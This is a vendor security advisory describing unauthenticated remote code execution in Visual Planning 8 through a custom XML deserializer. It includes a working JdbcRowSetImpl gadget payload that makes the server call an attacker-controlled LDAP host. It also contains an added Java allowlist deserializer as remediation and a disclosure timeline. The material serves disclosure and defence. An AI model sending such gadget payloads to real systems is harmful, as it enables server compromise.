Security Advisory

Visual Planning 8 Unauthenticated Remote Code Execution

Unauthenticated adversaries can gain remote code execution by exploiting Visual Planning's custom XML deserializer.

Advisory ID: MLSA-2024-003
CVE: none
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity: critical
Affected versions: ≤ Build 240103
Fixed versions: Build 240612
Discovered by: Hans-Martin Münch

Product description

Visual Planning is much more than just scheduling software. It’s a complete, powerful, and flexible planning management solution, designed to meet the various needs of companies, whatever their sectors of activity or their products.

Details

Visual Planning includes “VPDesk,” a client based on Java Web Start. The VPDesk client communicates with an XML-based web service; a typical XML message looks like this:

<?xml version="1.0" encoding="UTF-8"?>
<com.visualplanning.query.NamedMethodParameter>
  <methodName>getPublicApplicationProperties</methodName>
  <rawResult>false</rawResult>
  <userSession isNull="true"/>
  <values>
    <HashtableValue>
      <key>ENCODING</key>
      <value class="String">MG6J5V2JQ29RT5L1</value>
    </HashtableValue>
  </values>
</com.visualplanning.query.NamedMethodParameter>

Visual Planning uses a custom deserializer to process these messages, located in the class com.stilog.xml.SimpleXMLParser. Put simply, the deserializer creates JavaBeans from the provided XML document: it first invokes the class’s default constructor, then identifies the setter methods (setName, setXXX) for the properties present in the document and invokes them. The process is very similar to common JSON deserializers like Jackson.

The Visual Planning deserializer does not impose any restrictions on the classes that can be deserialized, as long as they follow the JavaBean conventions and the class is known to the server.

An adversary who can communicate with the XML-based web service can force the deserializer into creating a new instance of a “dangerous” class and invoking the setter methods of this class. For example, by using the internal Java class JdbcRowSetImpl, it is possible to make an outgoing JNDI call to an attacker-controlled LDAP service.

<?xml version="1.0" encoding="UTF-8"?>
<com.sun.rowset.JdbcRowSetImpl>
  <dataSourceName>ldap://attacker:1389/o=reference</dataSourceName>
  <autoCommit>true</autoCommit>
</com.sun.rowset.JdbcRowSetImpl>

Visual Planning 8 uses Apache Tomcat, which provides a known JNDI ObjectFactory that can be used to gain remote code execution.
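The following is an added example, not code from Visual Planning, MOGWAI LABS or the patched SimpleXMLParser. It reproduces the bean-style mechanism described above (root element names the class, child elements drive setter calls via reflection) and shows the control that was missing: an explicit allowlist that maps permitted root element names to concrete classes, so that untrusted input never reaches Class.forName and a message whose root is com.sun.rowset.JdbcRowSetImpl is refused before any constructor runs. The class names AllowlistBeanDeserializer and QueryParameter are constructed for the example; only String, boolean and int properties are handled, and the nested HashtableValue structure from the real protocol is out of scope.

```java
import java.io.ByteArrayInputStream;
import java.lang.reflect.Method;
import java.nio.charset.StandardCharsets;
import java.util.Map;
import javax.xml.parsers.DocumentBuilderFactory;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

public class AllowlistBeanDeserializer {

    // Constructed sample bean standing in for the server's own request classes
    // (e.g. NamedMethodParameter). It follows the JavaBean conventions.
    public static class QueryParameter {
        private String methodName;
        private boolean rawResult;
        public void setMethodName(String v) { methodName = v; }
        public void setRawResult(boolean v) { rawResult = v; }
        public String getMethodName() { return methodName; }
        public boolean isRawResult() { return rawResult; }
    }

    // Hypothetical allowlist: root element name -> the only classes the service
    // legitimately accepts. Attacker-chosen names are never passed to Class.forName.
    private static final Map<String, Class<?>> ALLOWED =
        Map.of("QueryParameter", QueryParameter.class);

    public static Object deserialize(String xml) throws Exception {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Harden the XML parser itself: no DOCTYPE, no entity expansion, no XInclude.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setExpandEntityReferences(false);
        f.setXIncludeAware(false);
        Document doc = f.newDocumentBuilder()
            .parse(new ByteArrayInputStream(xml.getBytes(StandardCharsets.UTF_8)));
        Element root = doc.getDocumentElement();
        String rootName = root.getTagName();

        // The missing check: refuse any root that is not explicitly permitted.
        Class<?> clazz = ALLOWED.get(rootName);
        if (clazz == null) {
            throw new SecurityException("class not permitted for deserialization: " + rootName);
        }
        Object bean = clazz.getDeclaredConstructor().newInstance();

        // Child elements are mapped to setXxx(...) calls, as in a bean deserializer.
        NodeList children = root.getChildNodes();
        for (int i = 0; i < children.getLength(); i++) {
            Node n = children.item(i);
            if (n.getNodeType() != Node.ELEMENT_NODE) continue;
            String prop = n.getNodeName();
            String setter = "set" + Character.toUpperCase(prop.charAt(0)) + prop.substring(1);
            String text = n.getTextContent().trim();
            for (Method m : clazz.getMethods()) {
                if (!m.getName().equals(setter) || m.getParameterCount() != 1) continue;
                Class<?> p = m.getParameterTypes()[0];
                if (p == String.class) m.invoke(bean, text);
                else if (p == boolean.class || p == Boolean.class) m.invoke(bean, Boolean.parseBoolean(text));
                else if (p == int.class || p == Integer.class) m.invoke(bean, Integer.parseInt(text));
                // Other parameter types are deliberately ignored in this example.
            }
        }
        return bean;
    }

    public static void main(String[] args) throws Exception {
        // Constructed message using an allowlisted root: deserializes normally.
        String legitimate = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>"
            + "<QueryParameter>"
            + "<methodName>getPublicApplicationProperties</methodName>"
            + "<rawResult>false</rawResult>"
            + "</QueryParameter>";
        QueryParameter q = (QueryParameter) deserialize(legitimate);
        System.out.println("accepted: " + q.getMethodName() + ", rawResult=" + q.isRawResult());

        // Message with the root class from the advisory: rejected before instantiation.
        String rejected = "<com.sun.rowset.JdbcRowSetImpl>"
            + "<autoCommit>true</autoCommit>"
            + "</com.sun.rowset.JdbcRowSetImpl>";
        try {
            deserialize(rejected);
        } catch (SecurityException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The allowlist is keyed on the element name rather than on a class loaded from it, so the decision "is this class acceptable" is made without loading anything; a denylist of known gadgets (JdbcRowSetImpl and friends) would leave every other bean on the classpath reachable and is not a substitute.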

Workarounds

None

Coordinated Disclosure Timeline

  • 10/06/2024 MOGWAI LABS requests a security contact through the official contact form
  • 11/06/2024 Response from Visual Planning sales, requesting technical details
  • 11/06/2024 MOGWAI LABS provides vulnerability details and examples
  • 12/06/2024 Response from the dev team: they implemented a patch and deployed it to a test instance
  • 12/06/2024 MOGWAI LABS performs a quick review of the implemented patch and asks for a CVE and a release plan.
  • 19/06/2024 MOGWAI LABS requests an update since we received no response to the previous mail.
  • 21/06/2024 Response from Visual Planning devs: they will not request a CVE. The question regarding the security update release was not answered.
  • 21/06/2024 Response from MOGWAI LABS asking whether MOGWAI LABS should request a CVE, and when the patch will be released.
  • 10/07/2024 Request from MOGWAI LABS, asking when the security update will be released.
  • 10/07/2024 Response from Visual Planning: the build has already been released through their update portal as part of the monthly updates.
  • 10/07/2024 Public release of the security advisory.